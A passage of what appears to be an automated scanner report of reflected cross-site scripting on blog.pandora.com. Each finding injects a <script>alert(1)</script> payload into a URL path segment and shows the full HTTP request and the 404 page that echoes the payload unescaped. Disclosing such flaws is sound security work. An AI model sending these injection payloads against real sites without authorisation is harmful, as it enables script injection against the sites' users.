<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)</script>c07d7b6b6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)</script>73d64655690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)</script>7f101df09f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)</script>063e227bb42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)</script>e5f841d0237 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)</script>ee09fe65134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)</script>9cab335ec9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)</script>cdadd2e3fba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)</script>04358b3b570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)</script>796ed772059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)</script>c05ada4297f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)</script>0051722519f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)</script>a7a6b182afd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)</script>47ec2e2aa5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)</script>1fdd8212aca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)</script>92fb96256a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)</script>68fbf40c4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)</script>00e0120b037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)</script>b9522db024f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)</script>e4d44414054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
